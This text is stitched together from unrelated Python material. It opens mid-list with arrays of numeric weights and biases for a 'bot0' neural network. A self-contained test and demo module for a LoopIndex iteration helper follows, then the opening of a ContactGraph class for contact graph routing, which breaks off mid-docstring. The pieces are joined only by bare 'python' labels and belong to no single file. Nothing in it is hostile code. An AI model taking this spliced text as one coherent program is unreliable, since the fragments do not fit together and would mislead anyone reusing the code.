0.9097370347506772, 0.608488507195525, 0.48459294969941347, 0.4117062853169585, 0.6316425107733616, 0.34895570331837655, 0.7797265785232883, 0.6262989072693582, 0.32729717085766297, 0.001542481832736864, 0.8248181424888651, 0.4008508801383429, 0.9159097322704373, 0.2041858713170579, 0.548005858871324, 0.7133974117205364, 0.35443661642301083, 0.13366457841455603, 0.09096511029859067, 0.8971724597204428, 0.2269057842065687, 0.8286848514417559, 0.9793538689764325, 0.2823933629803702, 0.03777174578683451, 0.8852384928927112, 0.882891685815501, 0.8999635182501053, 0.8900693806743305, 0.35265537137140013, 0.20870639733171548], [0.666182867169213, 0.5466551783359995, 0.6699350921265178, 0.7111843015831332, 0.8105621986054513, 0.9450272872482796, 0.7107842148363458, 0.1872490228303877, 0.8295116276231063, 0.13644930953662726, 0.11757410507394339, 0.5934293090694761, 0.31768567026270167, 0.5011213485863961, 0.31941196394290194, 0.29954757006835664, 0.47450576418293355, 0.45054565378934297, 0.33774547473622074, 0.33657045142022923, 0.49322997134256175, 0.6874713527509797, 0.6483837633093413, 0.7075837767401462, 0.75681580589286, 0.689633801660392, 0.7744726800439359, 0.548198305013008, 0.4323706150906568, 0.8201856306208845, 0.8355771214707999, 0.9747623659656948, 0.058568265547960574, 0.2598566200316589, 0.08718095846727236, 0.6402600057142442, 0.007338613487693713, 0.7945974869661111, 0.983419215053928, 0.7726449986141048], [0.510881563985941, 0.7721654920914746, 0.9146982279422192, 0.8816965545774509, 0.9429692826257653, 0.12727443505520752, 0.20842822809308093, 0.42652248469530096, 0.016768368283273216, 0.43809066421074194, 0.12687104675349914, 0.6468074551094772, 0.9674579797553892, 0.5540523420890983, 0.14702395683967784, 0.4190069286359057, 0.9683458400464705, 0.49123090710627604, 0.648205292714437, 0.19809035023851596, 0.7283330652034565, 0.6058526754343619, 0.7149790489848675, 0.5888887314095956, 0.29255101311237763, 0.9454791070671928, 0.40255961895792525, 
0.5892559782715333, 0.07462886046582573, 0.5974160304905439, 0.7692569752137837, 0.28385249538066015, 0.17893121543595725, 0.5062907691797828, 0.15631164241584083, 0.8721053940210177, 0.7417732869222234, 0.9963016193864281, 0.7911831384889905, 0.5795913199944962], [0.09043579321062079, 0.15727858890572655, 0.19502035106319315, 0.24406938021459001, 0.4352898807882579, 0.7424569515330994, 0.7785985981122928, 0.8689424469152366, 0.3260426031734943, 0.06740361274574425, 0.35939001185834873, 0.9335660207798734, 0.9464239221587253, 0.43574605781991493, 0.44284790785709593, 0.9347311050184343, 0.07666921908673752, 0.4424917307802476, 0.8239898422260858, 0.11799598214685059, 0.637851702557915, 0.8854521382598126, 0.9770084789905045, 0.15149581828792658, 0.16405451817980832, 0.8800455720240121, 0.7135028884089607, 0.8218323815245602, 0.838354605992176, 0.204274189164253, 0.6393701071881613, 0.8436824163207585, 0.7735298612505432, 0.516483285518135, 0.08689307134960211, 0.9231844851486531, 0.9655007608254343, 0.9213258340794077, 0.8450436259259676, 0.731234761959281], [0.2219746708118695, 0.5297795994286242, 0.10931873750495047, 0.05169661655303015, 0.5417487195747623, 0.051985637135126606, 0.6151270740217628, 0.5950907235927987, 0.6396819970548321, 0.486335073235587, 0.9033136742599506, 0.609830902843371, 0.6825521819207603, 0.5737692741513681, 0.241169550119271, 0.006541767049585312, 0.4832366281574322, 0.04175111374507967, 0.7364770352604144, 0.29168163004560044, 0.04414699093348029, 0.6914152611160199, 0.8315979403864622, 0.008150733979168878, 0.3287972932186086, 0.3854940612753289, 0.016457104841191672, 0.8468638595700386, 0.7724282172501084, 0.24635030084333553, 0.4900161579696386, 0.1552819348709631, 0.8226205897411606, 0.1413540626898081, 0.9619170400813458, 0.9865182814079577, 0.5146392944026943, 0.36090429692649584, 0.5869204032228983, 0.21240826907944943], [0.37913816643976506, 0.12642024996582957, 0.7104728022952082, 0.6401661630051931, 0.46628919018540316, 
0.5813438971466577, 0.38344649577718215, 0.7011352935231818, 0.9402298085678615, 0.6074284627928613, 0.7670579595369482, 0.5609530327356567, 0.33928823496533655, 0.631152725352499, 0.03501378748631634, 0.8739682481659181, 0.003237810727759971, 0.2927013850209301, 0.0420559549239381, 0.5412011478055372, 0.7021965719981249, 0.5774599097223979, 0.5908846805767635, 0.6649136106576253, 0.8466192711180195, 0.18548944123987454, 0.6623685954183326, 0.07472068468136195, 0.49717338209086126, 0.08231911863322572, 0.566695461309684, 0.5640546903015857, 0.579527069733132, 0.4554107205650547, 0.10336438427737749, 0.48552957576147093, 0.47931229371145023, 0.6336048050779687, 0.8377753289829373, 0.40584396101116416], [0.020931066043987534, 0.7693612051913421, 0.5020564399329285, 0.5415584403568868, 0.010987082522099234, 0.7913462829071669, 0.5716841584491845, 0.06501050948948484, 0.8315805282944826, 0.3892967916998421, 0.39542465785192904, 0.36336094818729703, 0.013890618460810522, 0.7928378092777397, 0.10603757076346432, 0.96308052597039, 0.8898156598070234, 0.8159038088716472, 0.2846186640574878, 0.6644493758364706, 0.34131185449934176, 0.07356955353712857, 0.5702131444637452, 0.14075461241884435, 0.9057765925274222, 0.312864332564193, 0.6417627255177022, 0.8580845535851801, 0.22558710275771932, 0.15124418194168143, 0.7069909984216061, 0.17315425764132042, 0.9889509316752451, 0.1531040167694604, 0.9102847498564701, 0.8503212872680526, 0.5825275057813811, 0.5844888859188019, 0.979525732164681, 0.26424675793622965], [0.09120387730318658, 0.455742681177442, 0.8526518178794467, 0.7062616650789587, 0.22722453490382244, 0.2210199337208847, 0.5737319472158511, 0.08060752406773763, 0.10481725778924245, 0.5175202211114157, 0.8334939932904504, 0.5903049252320582, 0.2285259651586211, 0.7249939913372211, 0.23193589587190466, 0.3456043837060758, 0.05245893750148056, 0.22962794486791338, 0.41653350578699, 0.45100683012539433, 0.27338139274185425, 0.959431159089695, 0.43767104155505465, 
0.9894814487208242, 0.658375526506583, 0.9273752617789098, 0.2295374999023163, 0.7649617018314054, 0.9469282856605002, 0.6298485188429842, 0.3829487821770633, 0.3980286586924491, 0.3093060927992902, 0.41733619782802756, 0.4515946997938127, 0.28946771167626484, 0.897267910958899, 0.589912902398637, 0.6241364279803275, 0.1036378670840915], [0.431207223030749, 0.9313889261276478, 0.5384534503066498, 0.4881506158081028, 0.04203051234748012, 0.009241966347972586, 0.23582130424236825, 0.5756218073308466, 0.723189482983854, 0.05301789999696671, 0.27644498357021596, 0.16417516749837402, 0.4050414550422069, 0.02276732818962479, 0.01703752181457574, 0.25739442887080954, 0.761665149879539, 0.7253983835750119, 0.2650051039705337, 0.41423266383976376, 0.2575137851659993, 0.27047117120688713, 0.12089321637978456, 0.904672560100186, 0.18345893957518444, 0.6411513722478539, 0.783693971847707, 0.042742458193551824, 0.2148263540535461, 0.1496844570774828, 0.4954664999256404, 0.8798874294942094, 0.21565654875320184, 0.28474920082638533, 0.06275251605567989, 0.9804817138676442, 0.7844659328704713, 0.43136206303891644, 0.4292195212786276, 0.20857137193472353], [0.3415512179326151, 0.6764104789890057, 0.495354122379814, 0.6863804088585107, 0.26964406295673704, 0.8020416739961985, 0.8824904102266534, 0.21187338596010674, 0.8349794157835084, 0.23458739649330163, 0.5972086492952792, 0.10294365057103994, 0.6251128263807871, 0.23638138472911108, 0.56619862089623, 0.8602680270941357, 0.9620746716455474, 0.7470837452081265, 0.5544113695525673, 0.2988906285618196, 0.1395806209891004, 0.3961941203003272, 0.22782489779100756, 0.018601448291538425, 0.29138914945670347, 0.8672698099210076, 0.39149144304430394, 0.851277533698289, 0.4732283177127583, 0.9662825075946619, 0.8483420134394011, 0.2960395194116284, 0.33131928903757935, 0.844045390492021, 0.19637286224017503, 0.6869298570203961, 0.9510785336935428, 0.5029709166915196, 0.5791115040203375, 0.033842415800878545], [0.5075113689730725, 
0.7008729234379416, 0.7840432647238358, 0.8981020621679869, 0.6384488750509538, 0.02534646636992144, 0.9254658826238548, 0.651152879679794, 0.03924665637160074, 0.7923807333544127, 0.945211338913243, 0.6668594671186614, 0.7951907294735059, 0.24053890879249562, 0.12594883989504035, 0.48252575340764947, 0.04592335108380663, 0.6580125216965366, 0.06747615328897116, 0.9422207609316988, 0.6310616379068102, 0.7324872095535372, 0.012055168742231448, 0.26457427770409425, 0.018575507810084102, 0.7633836142370064, 0.7441892988877095, 0.511641692898776, 0.9761065130955261, 0.41103721514452096, 0.09172544146110817, 0.8705066141379731, 0.6915407409483096, 0.35131120060548526, 0.3513271870248348, 0.8343943951662393, 0.07088358183730648, 0.9222791736993147, 0.23888758339197513, 0.4569279801283621], [0.2531874067610984, 0.8804480761473711, 0.5926667953651851, 0.3086647343341855, 0.6478744227263935, 0.5021295088824722, 0.10513666701340063, 0.712583577850166, 0.7798423787878452, 0.48890258009128795, 0.7194975524652997, 0.16267979706218882, 0.7078561604943057, 0.4827362802106677, 0.07712323130166887, 0.48753285261709056, 0.9934829260824676, 0.5602575686606993, 0.8003320497453161, 0.85903673844661, 0.9947438042286089, 0.9435932101269706, 0.18649152103828337, 0.502545646745528, 0.024405551377403523, 0.10314169427640119, 0.26106866160998277, 0.596601477259551, 0.73639839036458, 0.0575276475864438, 0.9101178833219197, 0.9311824526761551, 0.14361330802427474, 0.19487384015237608, 0.7908531875965357, 0.3651463454551753, 0.17583056889288806, 0.15329507361766137, 0.7374685286362075, 0.2662991395494052], [0.1344216956960128, 0.5007177799915079, 0.8904115637774512, 0.5798553709682275, 0.40033566344361815, 0.21857647614254405, 0.21261388059380038, 0.4705193569245596, 0.7853767423946021, 0.11605406446733002, 0.6407095840447491, 0.07780582205577313, 0.2943426627046284, 0.6338083321021053, 0.956668102247972, 0.40007854199046666, 0.34788174513699044, 0.26204614917534663, 0.4529553409493098, 
0.009009988493946852, 0.627035533168727, 0.16201894556668228, 0.49425939937108343, 0.4498756523484694, 0.840105279435422, 0.15479808928903127, 0.9211851539031551, 0.5330209252302638, 0.3747279979346121, 0.7552638958779772, 0.6024839887932808, 0.9228202507512663, 0.4570210485756221, 0.2362802673586628, 0.08910544420220623, 0.6014460964478587, 0.9250695838880614, 0.756326843273155, 0.3147482350837961, 0.8202616028185885], [0.33590447881562135, 0.4007402501408569, 0.16813485544180085, 0.2460835845191719, 0.7751493489209615, 0.8378555411394488, 0.8665469251374396, 0.33866620418728055, 0.4795530891354499, 0.45760000387041855, 0.1528728916836949, 0.5826364431257827, 0.8442270177354942, 0.40161813660398027, 0.7331381596768767, 0.2174146644910444, 0.007195641861198143, 0.7729281980022203, 0.747445457857178, 0.25537939510659347, 0.4941473273159547, 0.36425060255423336, 0.4073362683241889, 0.8612885533059496, 0.5350088200342898, 0.059378864035761536, 0.14488632522470357, 0.6105795087908726, 0.8927210539043693, 0.041722797244169496, 0.34063628059064943, 0.9939513050453366, 0.9025290987140709, 0.7260260605444951, 0.6770873147786107, 0.1230647133053725, 0.5104957162580814, 0.3155297541502543, 0.7024106413605149, 0.14484919498540272], [0.4881101233121684, 0.41071476649256566, 0.16273174243948885, 0.34092308692173623, 0.7915407193129415, 0.008307662621660827, 0.20620539051476783, 0.41042960651879823, 0.8176918361009802, 0.14281250500406495, 0.9611294668351972, 0.638072256152111, 0.6405056649060018, 0.12348523479795659, 0.6988669653476488, 0.1801036388888747, 0.160031142862897, 0.5154796184435111, 0.1603922534659974, 0.32169492093551133, 0.42019764364313106, 0.8327290382740076, 0.6453534125000819, 0.8503638354142109, 0.16075723452081125, 0.9660791612482171, 0.1814851099891236, 0.4860986570456407, 0.37610810037479037, 0.9042036948607018, 0.7146296500840329, 0.1818539332222241, 0.567907770071545, 0.7404674217682802, 0.12308605366048375, 0.14209480743832892, 0.9642758805048992, 
0.12228125705853865, 0.9168976009322206, 0.438190610315934], [0.6143818807492392, 0.05189205129326668, 0.5813604120651429, 0.9263203402763487, 0.07951042780113471, 0.08368894943308758, 0.5366137259011795, 0.4843694158337145, 0.7258838455339754, 0.2536410223964446, 0.36820096734578656, 0.056661212456568744, 0.5989730512912881, 0.8299732802825837, 0.21395137747606396, 0.6457393796643329, 0.4696235651574533, 0.6963353742412026, 0.6969155938917959, 0.6965924125825453, 0.6319791982215727, 0.5044562338985711, 0.5356001206521024, 0.9005536720964442, 0.42042911861951815, 0.8568299662381711, 0.1154383403482061, 0.9952083946108532, 0.5960247110141472, 0.41594379091434774, 0.7893067264325313, 0.4000170869219999, 0.8126611886738974, 0.14310699038605024, 0.10889541074675313, 0.13479426224822333, 0.8456880744666728, 0.18862628630126188, 0.3215912607090585, 0.5499366839568469], [0.45487669400732866, 0.7636519291724719, 0.9044383638845601, 0.30660347057615367, 0.975458607834666, 0.5365835577003023, 0.7611686039509037, 0.3293428814757414, 0.6357765421155, 0.031007382812284434, 0.4273084245524369, 0.824770830273977, 0.07818181914495337, 0.8501023197330511, 0.8093957168704089, 0.8000276355707528, 0.5897434602968332, 0.8010065352161336, 0.05514189563398175, 0.059322896854843044, 0.4201405171182324, 0.6966954510192541, 0.9811282381691626, 0.6785180238295281, 0.6044126365028397, 0.11021491853736898, 0.31568829160890455, 0.5303016773261048, 0.33984672623591605, 0.43038567700886143, 0.1212146445620722, 0.5244758915617389, 0.1654204707619692, 0.8306956581539089, 0.9407448463164394, 0.9750105461263899, 0.1481879156137872, 0.966788581579337, 0.2298791107255913, 0.19699316263071476], [0.8358037283396489, 0.41756738422617523, 0.30037595485298685, 0.505587226435338, 0.5054851169187434, 0.8818824100969341, 0.2202516109143834, 0.004984872538747909, 0.4135357085347674, 0.4264533071138237, 0.7078577270777933, 0.16817374180519118, 0.29143940730004725, 0.8236529488014616, 0.47319007232125376, 
0.33395835251500106, 0.6005045910444272, 0.7406643574744549, 0.8833099680782208, 0.05103096002786578, 0.9804701065673899, 0.053986722914696306, 0.23976390624434596, 0.24087800814380478, 0.6180145658165601, 0.15719292374577065, 0.8064023162904874, 0.4659598270139428, 0.9535780415484715, 0.1309925730078063, 0.0632000938650048, 0.7977428066062019, 0.5845820749030616, 0.6541950817179976, 0.2867590955273608, 0.5505426647997695, 0.9005597908499927, 0.9734175446995511, 0.6246751545115254, 0.2344717947090572], [0.5898981547380391, 0.03965883972796114, 0.24159428382831227, 0.8769846167837184, 0.6640820472012455, 0.32788687219599466, 0.07384128837768245, 0.9019356835476171, 0.9682950456661968, 0.5831188917083061, 0.5525416867804379, 0.6711372999816885, 0.741243824149109, 0.8901751964866755, 0.44590515089258365, 0.5099820931202883, 0.18004308958655835, 0.3022418390264009, 0.9378090379721243, 0.10524453441196424, 0.6895800835232304, 0.32420118549546273, 0.05451342843682827, 0.2510804373338231, 0.1395726070421044, 0.39772438971001967, 0.6607757844006914, 0.39446155527946214, 0.9219412026330176, 0.39313105035377804, 0.05893292586049681, 0.7640646599902158, 0.9642161727386028, 0.384052252351508, 0.1517702097031116, 0.1738299244582041, 0.3925219680137956, 0.2796199471557075, 0.7730713863262959, 0.5290854011455963]] bot0_wieght_layer_two = [[0.7924608499157508, 0.5533019807509733, 0.07842539598896592, 0.13059942670251723, 0.21994960485591653, 0.06602604179885252, 0.2984874961318884, 0.02311956694570738, 0.3795625133528373, 0.3228123010817604, 0.1459627414393977, 0.4722447812402685, 0.7830699141689073, 0.9280056071960512, 0.7154751421490831, 0.2845590414332202, 0.42673472449969707, 0.16801672697781056, 0.4342490763582669, 0.8806689340032496, 0.2712279244309813, 0.9965995752627571, 0.30227780611623745, 0.2447194490633301, 0.11180264703436904, 0.496843509240413, 0.44389950511618825, 0.3747600504188695, 0.18998912023351266, 0.8697165479518629, 0.7358884875814429, 0.7357390465068545, 
0.5971660015633152, 0.8858923288437276, 0.8561267361445972, 0.09187542200057675, 0.0011519641717783191, 0.06765276835184342, 0.7049447532474103, 0.6571469122639081], [0.6353314913187238, 0.5066627093634036, 0.45694862293534544, 0.8013877478578474, 0.9018853871665707, 0.513448066290405, 0.35238831046968744, 0.32117927928850676, 0.4254322310824109, 0.7432355591440651, 0.4538458305967823, 0.8485881616842691, 0.7929266142844223, 0.18336855397548957, 0.9329907108878449, 0.3733043918691539, 0.16115862069646414, 0.8702790759096, 0.545602288823806, 0.8434093145738594, 0.4076147443386855, 0.018914240649326453, 0.9082616110081991, 0.4393061983364057, 0.10312642014652318, 0.07009106020334088, 0.37061757833494113, 0.8510440791124326, 0.7818578435079506, 0.0684654276895289, 0.6697774886328678, 0.9937800549245825, 0.9933179473062644, 0.96591873257431, 0.3486414014247061, 0.13364658977396493, 0.48892169436751964, 0.39131015083636067, 0.18456436613584115, 0.7273046275338086], [0.027090989373142915, 0.8405222655426425, 0.8737670710797781, 0.4446050004997979, 0.25962275893438524, 0.4172117578568266, 0.6042081334007412, 0.6275682865973066, 0.8686796638122195, 0.9039720980065536, 0.6469892940088353, 0.6565430697168501, 0.8485900814355686, 0.8292150478384595, 0.12105265824833222, 0.04552012944640105, 0.49405654679583155, 0.554210122715284, 0.4703931195385931, 0.6469517092221198, 0.03224294683521023, 0.3056125922815588, 0.5547634669986748, 0.9683979465399061, 0.5988615386931472, 0.97939881197661, 0.9085514665631925, 0.6061520558056479, 0.935202691092468, 0.863039207575379, 0.6579717180463207, 0.15764778410578895, 0.8603411339474845, 0.05502237592766601, 0.6793235712276698, 0.958795451643341, 0.27240623185987756, 0.10826627929048349, 0.3877540308105024, 0.09136282915817973], [0.6004677891161132, 0.033580983629784456, 0.9714133815314732, 0.7373741338392421, 0.7119258387663442, 0.11352024552649498, 0.45168172875396073, 0.27102632287248574, 0.35621935723543874, 0.291706702502447, 
0.25094405062339287, 0.22638881016185775, 0.9392444765016329, 0.6773130776980483, 0.9654836726164856, 0.6502843263229239, 0.9385186370504787, 0.8214662746390888, 0.47770883639944306, 0.2953008024534969, 0.39819884063921707, 0.23860128518127688, 0.6566563405546643, 0.5527896889819153, 0.69077281393274, 0.6967472340646969, 0.6298121815610134, 0.684147664543683, 0.7049721113371529, 0.8598950032203031, 0.9633523239707148, 0.35089007627014657, 0.043767925663634855, 0.6359488424540123, 0.9938927406096162, 0.24191520040909642, 0.08367978763357597, 0.11599254132305603, 0.5967300042490618, 0.256662114330232], [0.7024385277210782, 0.32877853416699276, 0.8739021892693426, 0.893200989802283, 0.9335961253195939, 0.3790057245786844, 0.5180881076969663, 0.44565813065775184, 0.24428191054816628, 0.8790945771921924, 0.6270154185543578, 0.747093553999582, 0.4885447217527966, 0.5097660412958194, 0.31230194357616947, 0.5578282179447789, 0.09159564250036933, 0.621565614668811, 0.764366061532641, 0.7390174098157766, 0.1392348131957052, 0.7387024890082716, 0.2578476042020995, 0.19074562662747951, 0.1609056604345871, 0.1342283792786778, 0.6671386682982525, 0.21353507638338765, 0.392090621411078, 0.5206753046865467, 0.10585981773093023, 0.37686727091952665, 0.8688325329202707, 0.8848476820963005, 0.4194686788619777, 0.14017719382076244, 0.9617665529874843, 0.03666644643752415, 0.5155907708033867, 0.28146358790876624], [0.7790526301453559, 0.329137579348991, 0.6406343703472495, 0.9328921579626067, 0.6744053047110395, 0.8445693375713933, 0.21641880042442907, 0.9552513574304115, 0.46991817488444554, 0.0031699563763590843, 0.5159099793412398, 0.2723125046097187, 0.8116856555738962, 0.5663105589593875, 0.8433174463730233, 0.30216196599113654, 0.5586163215643194, 0.12618920847817128, 0.37544419867770895, 0.6978637887091959, 0.1388224973375245, 0.9708303042167001, 0.6141233513490831, 0.9185911212174693, 0.23171653367072165, 0.9958411887348882, 0.6792072521930418, 0.20949237067716875, 
0.7968320459418277, 0.32851054696057236, 0.6434176865699571, 0.968006044645234, 0.7727458311527614, 0.5223878847743492, 0.994703663869293, 0.19877113024880622, 0.2925349418277413, 0.13420486723335434, 0.35529102433832727, 0.02132014210962574], [0.8217485412993956, 0.7955986788335634, 0.2096615386324795, 0.517728730293321, 0.3100598219090861, 0.13340194208887457, 0.27108074737266497, 0.001417007983217533, 0.2284968386889783, 0.2611332972121654, 0.5696976552520397, 0.5525009075216284, 0.018502003115828614, 0.6319939313401512, 0.6268886925727343, 0.8922729091060876, 0.47739673947891037, 0.9684694726630932, 0.8588310498910229, 0.8146478278669018, 0.02841245101133305, 0.11799006897778752, 0.14349733010310672, 0.8732914428512268, 0.06379224264029759, 0.615501432154755, 0.2175271594488365, 0.29876635475845637, 0.07608110833910353, 0.004609684417057336, 0.8860297209862968, 0.42823539322110715, 0.6569881167939803, 0.30994708828716955, 0.13019180395420604, 0.012345557207740998, 0.04496176757748116, 0.30338819308116194, 0.4003366858969054, 0.44178099086549283], [0.918930768142277, 0.33011291931116227, 0.04215116750445558, 0.17090849961858579, 0.31938590191056904, 0.884357139400469, 0.053150056810457036, 0.44332594728134933, 0.49409541582132654, 0.8755504549852291, 0.5864579367029081, 0.09518867817599996, 0.8044681230006583, 0.2050719816305817, 0.7815995619320844, 0.47154539437149867, 0.5852725700010055, 0.9729866007408048, 0.003224018318599975, 0.9326243972471693, 0.27876428120131846, 0.32555309101651175, 0.8031969073531952, 0.035711339644172946, 0.7500275403784555, 0.6389598777555459, 0.31328316358503483, 0.5637916250202911, 0.8966986763519509, 0.36673639876687936, 0.6509813957442601, 0.8301821682528858, 0.7968374740887644, 0.08513319883590631, 0.8175578813911143, 0.9124735531342681, 0.42841714668740793, 0.13223458927413312, 0.1321862759053981, 0.15597474720482396]] bot0_bias_layer_two = [0.9709523793038841, 0.3197347987576674, 0.4152985357733182, 0.7636165162869605, 
0.17114740133673256, 0.6530871124156804, 0.9500677843219679, 0.8219432211803281, 0.361412967960291, 0.7630518529452371, 0.19893721282699595, 0.9184052050867298, 0.201185411073872, 0.656049852057201, 0.42806340050924774, 0.09221887067818768, 0.6920949534780607, 0.5639890330123942, 0.5961727597552606, 0.9174175646934064, 0.8730574112223339, 0.3060328361793859, 0.25464840086292684, 0.796467740988258, 0.7550012486168034, 0.003986448554077593, 0.0720218935127327, 0.4682381810407714, 0.39318020373897933, 0.4157842964202918, 0.7146597689977428, 0.9224098617233942, 0.5102969857273174, 0.9788330654858486, 0.5964186912399583, 0.33407788766793467, 0.4164945021221308, 0.36879798185946244, 0.015002096670957199, 0.43922048798573377] bot0_wieght_layer_three = [0.678485011995479, 0.6769019214693626, 0.13296323001225896, 0.408344686947429, 0.9918760430741626, 0.34458727890181484, 0.4018491030743456, 0.7252321966543048, 0.05551037367729328, 0.8967911004988389, 0.9224823600805313, 0.6672094345521605, 0.5282749268240046, 0.13028823903676823, 0.6905990354054673, 0.7979344714101553, 0.8210146216963327, 0.0606297783004468, 0.27117570769535704, 0.18232110425656634, 0.7247000496335553, 0.876864532784838, 0.4515745719355879, 0.5184986131840386, 0.6619375597052585, 0.1633617202688057, 0.9199819012927225, 0.6623250842194767, 0.1989694378696648, 0.9044191016640872, 0.6773001456109496, 0.5642309402203227, 0.8450298490634149, 0.34856976397462947, 0.2960010405066179, 0.5278429975374965, 0.2721287819813696, 0.6573157709647922, 0.9674543251893654, 0.829240161937682] bot0_bias_layer_three = [0.2971151712515807, 0.44049196814586233, 0.020480305711626956, 0.8409035705395105, 0.3335528017310272, 0.894302479392005, 0.9459298378741281, 0.3640146372756523] bot0_fitness = 49.94596758288455 bot0_num = 0
python
# -*- coding: utf-8 -*-
"""Console demos and assertion tests for the LoopIndex helper class.

Running this module executes the assertion suite at import time; the
``__main__`` guard additionally runs the interactive console demos.
"""
from loop_index import LoopIndex
from os import system


def backward_iter_console_test(num_list, jump, start=None):
    """Print the items of *num_list* visited while iterating backward.

    Args:
        num_list: List to iterate over.
        jump: Positive step size; iteration moves by -jump.
        start: Starting index; defaults to the last index of num_list.
    """
    test_announcement = "Backward iteration by " + str(jump)
    # FIX: identity comparison with None (was `start == None`).
    if start is None:
        start = len(num_list) - 1
    else:
        test_announcement += " from " + str(start)
    print(test_announcement)
    index = LoopIndex(0, -jump, start)
    print(repr(index))
    while index.check_bounds():
        i = index.get_value()
        print(str(i) + ": " + str(num_list[i]))
        index.increment()
        print("Next index: " + str(index._index))


def forward_iter_console_test(num_list, jump, start=0):
    """Print the items of *num_list* visited while iterating forward.

    Args:
        num_list: List to iterate over.
        jump: Positive step size.
        start: Starting index; defaults to 0.
    """
    test_announcement = "Forward iteration by " + str(jump)
    if start != 0:
        test_announcement += " from " + str(start)
    print(test_announcement)
    index = LoopIndex(len(num_list), jump, start)
    print(repr(index))
    while index.check_bounds():
        i = index.get_value()
        print("Value at " + str(i) + ": " + str(num_list[i]))
        index.increment()
        print("Next index: " + str(index._index))


def generate_range_list(length):
    """Return [0, 1, ..., length-1].

    FIX: this function was defined twice with identical bodies; the
    duplicate definition has been removed.
    """
    return [n for n in range(length)]


def test_backward_iteration(num_list, jump, start=None):
    """Return the items of *num_list* visited by a backward iteration."""
    # FIX: identity comparison with None (was `start == None`).
    if start is None:
        start = len(num_list) - 1
    visited_items = list()
    index = LoopIndex(0, -jump, start)
    while index.iterate():
        i = index.get_value()
        visited_items.append(num_list[i])
    return visited_items


def test_forward_iteration(num_list, jump, start=0):
    """Return the items of *num_list* visited by a forward iteration."""
    visited_items = list()
    index = LoopIndex(len(num_list), jump, start)
    while index.iterate():
        i = index.get_value()
        visited_items.append(num_list[i])
    return visited_items


# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
list10 = generate_range_list(11)
# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
list11 = generate_range_list(12)

# Forward tests from index 0 with an even length
assert(test_forward_iteration(list11, 1)
       == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])
assert(test_forward_iteration(list11, 2) == [0, 2, 4, 6, 8, 10])
assert(test_forward_iteration(list11, 3) == [0, 3, 6, 9])
assert(test_forward_iteration(list11, 4) == [0, 4, 8])
assert(test_forward_iteration(list11, 5) == [0, 5, 10])
assert(test_forward_iteration(list11, 6) == [0, 6])
assert(test_forward_iteration(list11, 7) == [0, 7])
assert(test_forward_iteration(list11, 11) == [0, 11])
assert(test_forward_iteration(list11, 12) == [0])
assert(test_forward_iteration(list11, 13) == [0])

# Forward tests from index 0 with an odd length
assert(test_forward_iteration(list10, 1)
       == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
assert(test_forward_iteration(list10, 2) == [0, 2, 4, 6, 8, 10])
assert(test_forward_iteration(list10, 3) == [0, 3, 6, 9])
assert(test_forward_iteration(list10, 4) == [0, 4, 8])
assert(test_forward_iteration(list10, 5) == [0, 5, 10])
assert(test_forward_iteration(list10, 6) == [0, 6])
assert(test_forward_iteration(list10, 7) == [0, 7])
assert(test_forward_iteration(list10, 11) == [0])
assert(test_forward_iteration(list10, 12) == [0])

# Forward tests from other indices
# Iterate by 3 from 2
assert(test_forward_iteration(list11, 3, 2) == [2, 5, 8, 11])
# Iterate by 5 from 1
assert(test_forward_iteration(list11, 5, 1) == [1, 6, 11])
# Iterate by 4 from 5
assert(test_forward_iteration(list11, 4, 5) == [5, 9])
# Iterate by 8 from 7
assert(test_forward_iteration(list11, 8, 7) == [7])

# Backward tests from last index with an even length
assert(test_backward_iteration(list11, 1)
       == [11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0])
assert(test_backward_iteration(list11, 2) == [11, 9, 7, 5, 3, 1])
assert(test_backward_iteration(list11, 3) == [11, 8, 5, 2])
assert(test_backward_iteration(list11, 4) == [11, 7, 3])
assert(test_backward_iteration(list11, 5) == [11, 6, 1])
assert(test_backward_iteration(list11, 6) == [11, 5])
assert(test_backward_iteration(list11, 7) == [11, 4])
assert(test_backward_iteration(list11, 11) == [11, 0])
assert(test_backward_iteration(list11, 12) == [11])
assert(test_backward_iteration(list11, 13) == [11])

# Backward tests from last index with an odd length
assert(test_backward_iteration(list10, 1)
       == [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0])
assert(test_backward_iteration(list10, 2) == [10, 8, 6, 4, 2, 0])
assert(test_backward_iteration(list10, 3) == [10, 7, 4, 1])
assert(test_backward_iteration(list10, 4) == [10, 6, 2])
assert(test_backward_iteration(list10, 5) == [10, 5, 0])
assert(test_backward_iteration(list10, 6) == [10, 4])
assert(test_backward_iteration(list10, 7) == [10, 3])
assert(test_backward_iteration(list10, 10) == [10, 0])
assert(test_backward_iteration(list10, 11) == [10])
assert(test_backward_iteration(list10, 12) == [10])

# Backward tests from other indices
# Iterate by -3 from 10
assert(test_backward_iteration(list11, 3, 10) == [10, 7, 4, 1])
# Iterate by -4 from 9
assert(test_backward_iteration(list11, 4, 9) == [9, 5, 1])
# Iterate by -5 from 7
assert(test_backward_iteration(list11, 5, 7) == [7, 2])
# Iterate by -6 from 4
assert(test_backward_iteration(list11, 6, 4) == [4])

if __name__ == "__main__":
    print("Testing with the following list: " + str(list11) + "\n")
    forward_iter_console_test(list11, 3, 2)
    print()
    forward_iter_console_test(list11, 2)
    print()
    backward_iter_console_test(list11, 2)
    print()
    backward_iter_console_test(list11, 4, 10)
    system("pause")
python
"""Implementation of a contact graph object.""" from collections import OrderedDict, namedtuple import math import networkx as nx from .contact_plan import ContactIdentifier, ContactPlan # ContactIdentifier object for better readability and access to identifer # tuple object. NeighborLists = namedtuple('NeighborLists', ['successors', 'predecessors']) class ContactGraph: """Represents a specific contact graph in the CGR context. The :class:`ContactGraph` object represents the same information than a :class:`ContactPlan` object, but in a different form. It can be generated based on any :class:`ContactPlan` and is subsequently used for CGR routing purposes. Args: contact_plan (pydtnsim.ContactPlan): The ContactPlan object posing the information base for the new object. Defaults to None. """ @staticmethod def _create_graph_edges(graph): """Create the edges within all nodes of the contact graph. Args: graph (dict): The graph object that already contains the nodes and that's successor/predecessor lists should be generated. 
